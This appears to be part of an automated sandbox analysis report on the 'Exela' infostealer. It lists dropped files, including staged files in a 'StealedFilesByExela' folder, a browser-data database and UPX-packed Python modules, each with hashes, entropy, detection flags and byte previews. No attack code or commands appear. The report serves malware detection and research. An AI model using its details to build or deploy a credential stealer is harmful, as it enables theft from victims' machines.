Preview:AQRFEVRTGLRPNVUMAMHTYETEVGDENHEHZDAQRXZQCDHHLTUZIEJRCQGGPRQWBIYWADWJEZTAELERKZUDZJHSFVIUPBTJVGKYQFWVMPTQUZUZZSOJNBOABYGRCYMPSQARVQUZQVCNVECXPCBIEBYWXWSRMTKFKBEHRJGIPFMOYSZMEELAQPGBHDTUPVXJROQBNFXLTFTPQHVAGKBRLNHZRZVUTEGANMGKVRFJJNOMKLVMQNTHIORPQCPGNIZSOYKXAQJCOPIGBQRJINVPIRVOHHCOGWQPXWQEGDKAHJASRIJBIMZDOWPSCSZZQNZFPNLCIRCXKLGBVXKUJASQXRHFULXFGHARZKMVRSMXPJPUDKEQXOSCEBAKVRLNKSSEVKXVMESKRHMKSXSUKELGCEYTRDUXROEARVKPGFZHNSDRPAQVQVSCJPHBVIRZPYJKRBBZNOUQWXJMMJNDFWGGJPGQMMWRHVVMGZTXMHGJMPQFKEKIAULKOFHNCPDGWVUWIVKGZHFAQVQOBPOUZZTMTUXLURTPHPWRVYABSKGEOJTHCTJYEQSHAVPELOSNLRXFRVWMHJRZTZLGKGNKELBIANUAYANWKNNJPQUXDOBXLYTGIGYZMXXBSVTKCOWSZHFODTFONXVLBRUGJKEZMTIRWSGAANCFOWQHTMLCODGMRHITYHVPOCCXAYGLOXHITQDUATUBKLPLHFHTHTEONDGTWZOQVYRUABLZCNSDXFSTUTQJACVNWWCLMGVDGIDXECYLUJKBUKWQQUERSQSLBAKCXGRYMXSMUPSLSRDICMSQOGBWCATEAACXPGZFMXCSVNIZUQRAQEWTFWYKNKMGGMAZDJHXXORIHLHSPMGKAWZUQOKTRGEGDEPETKDTOVQKFNIASUNQNVNPECXIFOSOXOYCRVRJAKLVRMRCMTVZUHFLJPYFXCUSTATJHRIINTHARIAPEKFSUPRLIGJHIMRLJERLFFTZAQPSMLNNQSZLYNDGBIYC

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\LIJDSFKJZG\BXAJUJAOEO.png

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.701111373123985
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:wSplMoG/A1oXDoMwazZW6QAFWyGjkGKnEuDxOaV9YnF7U:walZG/A12L8MFYr8EuxTK9U
                                                                                                  MD5:CA5A3E2A0C2DDF92EABE165672425976
                                                                                                  SHA1:1933AC1A510945A766039E7E61D7DA4156E0F074
                                                                                                  SHA-256:4180C6A01C86C7D86A51B5C17957BAECF34EBB7FCB6C5968835A5DB64E3C9667
                                                                                                  SHA-512:64FC7B64CDAF57CF026C803A16036BDDC46CA86AC9C35A804FCE188AFA3056C324D62CCEBD45E7E607A53D11A1035CB6C38B24004D14F0DC17B11D8DFBD7DB6C
                                                                                                  Malicious:false
                                                                                                  Preview:BXAJUJAOEOZPYQVMPMMPXXMVCPSLTTLUOLYYQUQKLRMOQNFWEOCYDOLITPCVDLYSWYQACZEJIDILMNOOUVEVBOSWPXYLBOGFYWHZVFNHRJXYLODFWJLFJKMUXRMLQJAGMERGOWKSMBXUJUMRUBMROMDBISUWTFWPXBVVSTBYHRHUOKCJNGMCOLUFOVLKFFIUZHRPZUITDNNTTEJKTUSBPVEUSTDXHRMZNWZQSUEGRYELXBLVKZHEIVACMOHJWFJRPJKNIDOXZHIEUDGLSGKALGUCHSOBYGTVWDOVYUEMXJWYDCHTXKLWDJLIZFFBQOMRYKZVRXZYKIPKCJEYOVOQCGFXCUNQKHYBXFYRGYUQAUKMCSQKKDJIQWKZEWMJWHJDDENKZLPNJAJLVIEXHEGVFHRIOBAWGXOXLQJIISBHZZGJYZBYNUOKMCKTICSMRTMZVLKMZTCWKHOHWQBKEBGEASMMYEGDDSCGDTYEPANLCQSJIRCTCUHXIVGBREMBTULUXWAZISUYERUZPWQLRSPPVNCMSPDUHQTJKYNEEWYIFNUCJJSDFDNQJLWDBLURDBXKLJVMGWUBKEXPYFIJNWRSUNUJBZAWJQEZWEYFLNXWPKFJZFMVPYOJFFUYCTEUKFWSOFUOTKIGENNTAAXCAHPWQNKMKKGNWIOGZOBPOTDAQLZSIGMQTNQVGQJNNITTRMOHBPCHTGJANZTLZHNSTOQXJKIAZXWPQWIDJXZUURGYMTMZTWQNTRVEKAAWBRZQWZYVWKWEVAUTRSOXDHWSYIZYRJFVXSPNFOTDNAGHDFYSAEEFBXGQQGYMZHMQHZTDMNYXDQJKMLAXJWCBQUIKQFEPVZNRMOWEKGFDLUJLSXRKKJUIGCSCGZTXLHOWGMKDLSQHDWSPCYROUJEHKXBJSADOXSOMTTUGHDSOBTNUEDCBNWNIDSDBZKBGFCJHQNDVAAZTKEIMDCTKNOQUKPNHEQOBANQSCJQRQBRAIBBXRYTT

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\LIJDSFKJZG\DQOFHVHTMG.mp3

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.702862417860716
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:JCmIDeBF63lGj/+QvH8n8JCl7odrVgKqBP68iz:4QQQvHFrTqBPXiz
                                                                                                  MD5:CC0686FCDF6617729D1EDF30F49501F1
                                                                                                  SHA1:02D629848E3D467D8143B057F003E0D7448126CD
                                                                                                  SHA-256:31E15305BC0579F03C51A1D6534B332F32C73ABC6D1B68BA0BDA6FCF97F593C9
                                                                                                  SHA-512:8BD18EB486BA6D2799329D9A8EFB3F52C3D109F5CB070290418DDE4B58756CD023857E4CAE62323C530FA0D3A60372C97D9744C1911A688D3592EABD14005F25
                                                                                                  Malicious:false
                                                                                                  Preview:DQOFHVHTMGONGZJMTUDJRBBZMRPVREMYHKGEHFUQYXZCSKHYXSDQYNTHYMAXXVSVAUOGMFIYPDCQLTHSECIYLWTRIBFEAYHUXINIFQBTJDZMINEEJPQYKGEESHWZILKBYECTPQSECVJBFSZOCCSNOVPIAHSFZWVXPNEQGUOXWPBXJRUYFARJLNHPVXAJZAMAADRKIWNDXYEBYMEBSXOJGEOURNOIBBLONDSVHAOQHPMGXZYJJTGITBJPQEBNXGZYUKARGBCVCJUHSRNNEVOIGUVCJVMNFBKNVZYQADNKMLUVPOTXVOQFRBXUSSRFMQEZCJFQXKCGKGKCVGGVBKNPTNSSMADFJLSDMVXHSOETKCENTGLOVOHUYJFTIWFHKFJRYNOXVIGPLHNBFPFOCWMNOQXWIPYAHPKRVTBFYKRBDVDUAZBSLWPPMXJXDVRCRPKOGCUKNZKBLJGIGZASUAZBLZBMGJSBNQSVTMGEWGLMNJKCSBEAGDUINAXDWMHJASNQRRDMKVXOKATATHRLEOJRPCUOAVQIESHZYWIQCSCAPIAJHBTEIYVRFEDCQDCDIYPMQVBWUEHDPIDAGKYZBMLBDUTEIFYLBSHAWEMNTPQDCSTOWSBZWQEBLVBNUWKZFUDMPBKETDOEOIXRFTDUFIBPBSUHXQTCPRPZAKDTRWMGSAVOZBNDDMDIHBSGIPOMYLKSGKUWRGKNXSOLUZDUZYQFQTKMNWLSYKVAQVIHJTFYNRTERQMIRVMLNWEIMHPIWEWIZJJRGOCBVHFGCSCPAIQYTEMYIQJKVUFAZERTMPUQSRHOZHOYABIALCSKDKHEDHJGKBYVCDZGPYPCLDCEFHWFMLSBOUUGKJFXSVKJVYVTSMIZISSWNRRWBNOMXZCOJAULXRXTNHTYWTZNFOKXVGZMTRVOSMSRMYBHKSHRCPZSSMDBJOTQQRGYIHEMZHHSWECVAOPVNLGBYHZVZPLQHOTCJNPUXICWZBLKAQFGUZPW

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\LIJDSFKJZG\LIJDSFKJZG.docx

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.69486718145169
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:XvKYeI9D5UOyoiaxIKgpZ9ONvMyTONN5ZjJH1U:yyD6yxILZ9OtTT+XRG
                                                                                                  MD5:E63B196AE0D5F7670244FB1347D75EFC
                                                                                                  SHA1:1C17108AC7E5263674836BAD67AE44D8C3C6890B
                                                                                                  SHA-256:D8C0D7B9CDFC72CAAB0A7687299B6734708E98C6DD088CDB0FF1A659E294B49D
                                                                                                  SHA-512:63345352964E1BD19AC843F82820E9B29C5BA991A002AB9B3164E1AA10B6D88BFA0DFAFA2E91E584835BA89B6A1770140AC14EA0B4B64E6C3BF8CDA34C9698AC
                                                                                                  Malicious:false
                                                                                                  Preview:LIJDSFKJZGBDGXNCCVBULCELYCDFJRIXKMFPVDHHKPYEYOXKFYMNEETRQHXLDRVBOTNERMYOYUJOPHUSKFPWBGKNJYBGZTTHNKGNUZWATSMORYBOIKBFSVUUMZNDYXOYKYUKGRNFVRQOPBEEIPDGTPBXCNLKHMGPHFCEQOUTEDGJZTMFUUGECZETRSODGZCJVQEAMRZADPDVQRANZOSHTGPOXPXGXXQDJVYZOCNXDECWJISPPIJOZUBSSKPGODUHTISNESPZRLELINJJYOXSBFTVUDENIBRDIMMGFIQNDGUSXDBHQNJRYLFTZGOCELKZGOQQKNDPFAMTXHBKHJYXYEGLJLANRMMTCVEFYRTWLXIMCCHDWVOLGVUWRNLSIBMLMBKVSYLKXRTMZROHVHCRDBCODTPNVQMBPRJGBGOOFVGDIERMXUFETJQWDXSQQFMQAZGGRVNRCUOAVYJDIMQETJOANIIDEGJCHEFRSNVBQAQBBUTTMXBTJXRHLSOCTPPBIKPXITOOCINTVZYAVQLVOOZWSOPLYJPOTKFKIKEHIDDPCDDEPKVDYQAVTVBFYYWCGUKGIDVLQSIPXISDEDNJWONTSILFUGUYMKQLKEJGOOCBYSXDFHNFHHWGLXWWQKSSOHSSTZLRZVRHZVBZGGEZQFSIWQQPMILSPBAMPAGAHHVJJCITDTJRZTRBEXSXOVDKONGLMSWBAOOYAFISJHKEYUKIWXBFUDUMVQRELEPVTNQBALAQOEAEFVPIKNYIPNICGKQFRVXNQUEFULLOYWMHOMUFEMHYNKNWMAOBGWSECZOKWISDOIKSUVWBGWPNAMFUHBRWEJQPHFPEKIRLAEPTBNRQEUVXXIZSSOOEFEETUMNPSVEAKOXVYHAOIXBEYBVXDJXZCNDVOPZLARFFUSXUOWXQBKDLINBWBQLXLHHNIXZEPCNHFEIZUZSTXWFUITSBKYSELMNKNBBDQMNLAIOSKYHCWGFPNUXAFSRHOWYH

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\LIJDSFKJZG\SNIPGPPREP.jpg

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.701796197804446
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:C1U2g6pCwYBq9+pGzEcrz023TZ9iFxwELi:2U2gCCm9drz0wTZsIEe
                                                                                                  MD5:C8350CE91F4E8E8B04269B5F3C6148DA
                                                                                                  SHA1:22D523A327EBAF8616488087E2DCE9DBD857F0CC
                                                                                                  SHA-256:1BE0B3682C4F3A3315465E66A2C7C357BB06225947C526B1B89A39D9D120AFBF
                                                                                                  SHA-512:C4891D35B6E895E4A9F4A785701EFFA4305AE88D09D309865F9312D95C296CB417916D8CBA461099E80F68C5AE5015A1172E60319256A453DE81445660F55806
                                                                                                  Malicious:false
                                                                                                  Preview:SNIPGPPREPVDSXKMBCQXEQRWSYOYKDGHPXSNVTYLWVPMUIXPKXDRFHMINIQBFZTPTVMTSZAWIXFLHCKJNAWKCQYMBHUKFDOIJBXXLUNVNMKEDOTTPPDLIAGSTXKJKMHVVGIGUNGKPTPDUEUVMGZRIBRMBHLZOZZIBTDOCDOASXCIFRVGCSENFOEARIYUEACCMVFPUDRRUHYQQFJBAWDGKHRWDHTGYUXKSSVSTFCVQOQGTKOBOMZZTKVYFLAXTKJMTUDSETBGCOOKYGPLGPNAFICZERONWJHOMIWLGEWSSANDAVRYRUWZSRNZFYKTMSQXLZZGTQKXVQLDKQIHEDADRTKYMYNBVWROSFBYUXYULCESFAKNPBXYOELAWZCZFAPVQWMMNLBQRIPMVDMMWGXGKDJNUJGGGBNSGWEDDLRHGAAWJCYOEMVEHAYXYEHSKMWJPPHERNLXAGENBCUAZODRTUDIOUWNPZSHJGYOVHWQKWRAGGUMLCITTLAJXOXDUPFFLAHWLWPRQRAXSKOBHTXQNNGYHHVLBOEFTHAXTLKUGTNIYSDATIJHBUFTSGQHRXQQGXCBWVJIULNMYSMFYMPXRZOWMHYMZOLIBIYHPQRQJTZOMJZHKRTSWQQVINGIZHWDLNCJKAMKHSMFOTUPQMESXHXMJSAXESVNVSKORQSXVCYCKNZKOFZFUKINTRLLEGXVQTQURFVKWLFRQZVQVBVOEMATWFLXFDJVWCYMPYCSJCUUGUCIPOPIVLEFNZCPNYAWTXOATSTYLECDEFJNQFYGVPQWTJBNAVWKGALRTACLENBODJOQDXMPOYCYEFXOOOOMCQXLRGDBUUVJNQAEBZDSPDLPFIEOXRWSFCHXDUSBTSLEDLCZPOHIMIMQZMHHTMDFUUMKUAMBYNWWRQKDEXPPDWGKCNTWTFNHBMNDQIMVNFYWGALYORHHPUAXLDHMTGOKMMTAOCOVLGFIHZLZFADWMNNCWOLNJDSGFCWVDBYK

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\LIJDSFKJZG\WSHEJMDVQC.pdf

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.694142261581685
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:f9GDi2EYjkpBrLp83PYbuFr5oKIQppDgX+qrctnWyd3z+g8BHGZ:yEYjkpZYwS/oKIuA+qriTjEBHe
                                                                                                  MD5:E9AA17F314E072EBB015265FB63E77C0
                                                                                                  SHA1:1233B76350B8181FFFC438B62002C02B4AE79000
                                                                                                  SHA-256:F66078FCFEC2D71549136CC8B5B4EE7D33C4994E0A4E3E7C11F5ADCD819D0436
                                                                                                  SHA-512:719E659924CE585E4DD8CEA9BC6B5371AD810999022F874F380F50C7153D3AE97CC934E3173EF06573CAEE6CBC835A668C4D7DC2ADE597B1B0D200FCBAC67DA1
                                                                                                  Malicious:false
                                                                                                  Preview:WSHEJMDVQCWJPIIWMEHEPOBRYLOZOHFMDEEYYASRZPHJZGFNCKWIQSPBUMWBCKDMTEBFINALYAFGJUQXINNGDKSDBFBQLHYZRLLDJYSVNXVIEPIYHZGOTARYUNPFNZVRVVWIOWWFIFWCHVVHXNGKFNRNLVVSOPOMGZCDQUWJFARKTCAVVDPTCPNIDLRGSLNKZTVRAJAILYGDVIAAGIVKXRCRTRZJPKATKZAWRJTPVLTDNBDIRDWCCHBTEVEGYPYDTGSMLUDQXMQCAVHLYMRKPCVHQHMGNCGBZKOUKCCBHQPSIYIJGDVOYJJJRQLDKNVUEXDKCTANSMCHJUBIODALXWUAFPSECIRPCAEPPBACCLXBZAEDKJHLGOICLSKBQEGFCVDQOFKKAJPCTRIXBNPUDXKHSSXTDTQZSFEWHTHKFNJWHOEXGCYSYWIHFSMYJIYEESDQFMESLFQFBUJNXHWFNXIDWEUDMVGFDXPTRRRNPARVUGZAYZRHNTXHZAPBLWMHFSSHMXCYMAGONQNLTCAVPZPCAKJRMGEPDIFETDNSXWPDVMAZGTTCLNRREMVTBLOGKASYOATUDXLJKIYPPDNLZIZMWWFFDVMUFCTZZOFJORNAMGQBAFGCPTDCZBKTIGYDSCSPMIEXAMGICZNTFVNRPLGPMBXJHNCQSYNMGGPKIQJNDBDUBVIVXFILKXZXHODXZAYIDEIMZZMKQNQNBCCMZNFBKSYULDGKOMQZDUQMUVTBBTUTRZMIOZGDEUPHCDKJQDSGBXYNWPWTHYVLGGYNOBJJKAZSTKJSBCHVCLGWYHCNILYSCYCHTGYOGMNGWDZAVDCOVKWJPWVNTTKFTSHAAXLYUEWEVGETFCFTLKWTQCVAMBWYOYJVXNPSSWXJXUZDXJOZNTBLIZLLJQXYNILILMHHONBPAPFMVWEMHIHAGMOXTIBNNEBGCVSZEZTMJVDXSVACSKTAVTFOOSEHZQGTOUSCIQBVIWZGABQNZGJE

                                                                                                  C:\Users\user\AppData\Local\Temp\Web.db

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                  Category:dropped
                                                                                                  Size (bytes):196608
                                                                                                  Entropy (8bit):1.1215420383712111
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                                                  MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                                                  SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                                                  SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                                                  SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                                                  Malicious:false
                                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI70882\VCRUNTIME140.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):109392
                                                                                                  Entropy (8bit):6.643764685776923
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:DcghbEGyzXJZDWnEzWG9q4lVOiVgXjO5/Auecbq8qZU34zW/K0zD:DV3iC0h9q4v6XjKAuecbq8qGISb/
                                                                                                  MD5:870FEA4E961E2FBD00110D3783E529BE
                                                                                                  SHA1:A948E65C6F73D7DA4FFDE4E8533C098A00CC7311
                                                                                                  SHA-256:76FDB83FDE238226B5BEBAF3392EE562E2CB7CA8D3EF75983BF5F9D6C7119644
                                                                                                  SHA-512:0B636A3CDEFA343EB4CB228B391BB657B5B4C20DF62889CD1BE44C7BEE94FFAD6EC82DC4DB79949EDEF576BFF57867E0D084E0A597BF7BF5C8E4ED1268477E88
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Joe Sandbox View:
                                                                                                  • Filename: 9g9LZNE4bH.exe, Detection: malicious, Browse
                                                                                                  • Filename: Holoscope-V1.3.5.exe, Detection: malicious, Browse
                                                                                                  • Filename: dsoft.exe, Detection: malicious, Browse
                                                                                                  • Filename: winws1.exe, Detection: malicious, Browse
                                                                                                  • Filename: discord.exe, Detection: malicious, Browse
                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                  • Filename: cmd.exe, Detection: malicious, Browse
                                                                                                  • Filename: NEVER OPEN!.exe, Detection: malicious, Browse
                                                                                                  • Filename: HeilHitler.exe, Detection: malicious, Browse
                                                                                                  • Filename: meN9qeS2DE.exe, Detection: malicious, Browse
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........u...u...u.E.t...u.....u...t...u..v...u..q...u..p...u..u...u......u..w...u.Rich..u.........PE..d.....y..........." ...".....`.......................................................5....`A........................................`C..4....K...............p.......\..PO...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......D..............@....pdata.......p.......H..............@..@_RDATA..\............T..............@..@.rsrc................V..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI70882\_asyncio.pyd

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):35712
                                                                                                  Entropy (8bit):7.645244129807927
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:U2sbZA5n1we/lPgOb1koYpu53VnJ2gl+NfUpv+I75n2EYiSyvPRPxWED:U2RhZtXxkoYiTTENE+I75n2E7SynRPx
                                                                                                  MD5:7D4F9A2B793E021F7E37B8448751ED4E
                                                                                                  SHA1:0EA07B5024501AAD5008655CFEAE6D96B5DA957A
                                                                                                  SHA-256:2293C1B6B0B901832A57A1C4DCB1265C9E92D21177195712C30632A7B63227D4
                                                                                                  SHA-512:AF75452279C308C61C3E222A031A8201E47E8FE44C4E92CB7DAB03D56C7E7E3E2A2C589F650C50E0B29E2DF175D6F2FF50C8E5E589D17A124BF0A2E0D7886C26
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........TF.q.F.q.F.q.O...D.q...p.D.q...t.J.q...u.N.q...r.E.q...p.E.q...p.D.q.F.p...q...|.G.q...q.G.q....G.q...s.G.q.RichF.q.................PE..d...$..c.........." ...".`.......... #.......................................P............`..........................................J..P....I..P....@......................DK..$................................... /..@...........................................UPX0....................................UPX1.....`.......R..................@....rsrc........@.......V..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI70882\_bz2.pyd

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):47992
                                                                                                  Entropy (8bit):7.809914406923306
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:NiQxyc/3D2HGItfsKbsonbgiHUoYbcp87I7tVbeiYiSyv5PxWEDX:N5xdEsKbtnbgqUoYb7I7tVbh7SyxPx9
                                                                                                  MD5:6250A28B9D0BFEFC1254BD78ECE7AE9F
                                                                                                  SHA1:4B07C8E18D23C8AE9D92D7B8D39AE20BC447AECD
                                                                                                  SHA-256:7D43F7105AA4F856239235C67F61044493EE6F95DDF04533189BF5EA98073F0B
                                                                                                  SHA-512:6D0AA5C3F8F5B268B94341DFDD5AFBE48F91F9AAC143BF59F7F5E8BA6F54205B85EC527C53498ED8860FDFF6A8D08E48EC4E1652EEAB2D3C89AAAF3A14FCAAA7
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................a.........................................t.........................................Rich....................PE..d...2..c.........." ..."............pd....................................................`.............................................H.................... .. ..................................................pp..@...........................................UPX0....................................UPX1................................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI70882\_cffi_backend.cp310-win_amd64.pyd

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):72704
                                                                                                  Entropy (8bit):7.915281953043909
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:g+638lwdrNzfq3MgGu9KgGWzt1iaqP+E4WnpH118g:gz8u/zf4MgGuZGWzt1ia7E4WpH11
                                                                                                  MD5:7727212E7BDBF63B1A39FB7FAAD24265
                                                                                                  SHA1:A8FDEC19D6690081B2BF55247E8E17657A68AC97
                                                                                                  SHA-256:B0116303E1E903D6EB02A69D05879F38AF1640813F4B110CB733FFFF6E4E985C
                                                                                                  SHA-512:2B1A27642118DD228791D0D8BA307AA39AB2D9C7D3799CFF9F3C0744FE270EEAEFE5545A4FDA6E74E86FEE747E45BF5F6C9AC799950C2B483A16EB3CE85D816A
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........#...p...p...p...p...p.y.q...p.y{p...p.y.q...p.y.q...p.y.q...p.q...pi..q...p...pX..p.x.q...p...p...p.x.q...p.xyp...p.x.q...pRich...p................PE..d......f.........." ...). .......0..@C...@...................................p............`..........................................c..l....`.......`......................hd..$...................................@O..@...........................................UPX0.....0..............................UPX1..... ...@......................@....rsrc........`......................@......................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI70882\_ctypes.pyd

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):58232
                                                                                                  Entropy (8bit):7.819692209624967
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:3UP3/jolpinLX2rRaWMzhBuW9I7QP7h7SykPxiM:A3/jolwXuRaW6wUI7QP7h2xB
                                                                                                  MD5:4B90108FABDD64577A84313C765A2946
                                                                                                  SHA1:245F4628683A3E18BB6F0D1C88AA26FB959ED258
                                                                                                  SHA-256:E1B634628839A45AB08913463E07B6B6B7FD502396D768F43B21DA2875B506A1
                                                                                                  SHA-512:91FA069D7CF61C57FAAD6355F6FD46D702576C4342460DADCEDFDCBC07CD9D84486734F0561FA5E1E01668B384C3C07DD779B332F77D0BB6FBDBB8C0CB5091BC
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......NC..."..."..."...Z..."..E^..."..E^..."..E^..."..E^..."...^..."...P..."...P..."...K..."..."..."...^..."...^..."...^x.."...^..."..Rich."..........................PE..d.../..c.........." ...".........p..P........................................@............`.........................................H<.......9.......0..........,............<......................................`%..@...........................................UPX0.....p..............................UPX1................................@....rsrc........0......................@..............................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI70882\_decimal.pyd

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):106368
                                                                                                  Entropy (8bit):7.93479712134
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:GgCMV2Mz94bMgxECS8kePpTn8jI75qNp6mx:G1MV2Mz94og2tJePpwpp
                                                                                                  MD5:20985DC78DBD1992382354AF5CA28988
                                                                                                  SHA1:385A3E7A7654E5E4C686399F3A72B235E941E311
                                                                                                  SHA-256:F3620CAC68595B8A8495AB044F19A1C89012F50D2FE571B7A1721485F7FF2E43
                                                                                                  SHA-512:61B8ECD2D12B3F785773B98D4BF4AF0EB6EB2C61FBEA6EFFB77EC24B2127E888D0EA5FDD8CC298484E0F770D70C87907048FC382FAACE8E0CA6B49AB106C89F8
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........|RTy..Ty..Ty..]...Zy......Vy......Yy......\y......Py......Wy......Vy..Ty...y......Uy......[y......Uy......Uy......Uy..RichTy..........PE..d...)..c.........." ...".p................................................... ............`.............................................P........................'......................................................@...........................................UPX0....................................UPX1.....p.......d..................@....rsrc................h..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI70882\_hashlib.pyd

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):34176
                                                                                                  Entropy (8bit):7.670946753848895
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:aW3dM1TMhvg8KNML5TOuzSsI/LpazI75ImyYiSyvfPxWEabVV/:aQdM1TMho8iMLPmv/AzI75Imy7SyXPxA
                                                                                                  MD5:3B5530F497FF7C127383D0029E680C35
                                                                                                  SHA1:FB5DC554BB9FF49622184CC16883A7567115C7CA
                                                                                                  SHA-256:5971FCC9758B7F4A12CDE2190A323F35A34AB7F97BD8C39CC8F3335223102573
                                                                                                  SHA-512:12CED7DDB0352F8ECA3C3CB7C7C2FAAF08E617B2DD278D20008051FB6B564B17C3E9ECFA8B0FFE7674154AD533DFBBF1E802ACCD5E1AEF12ECE01368DA06E85A
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
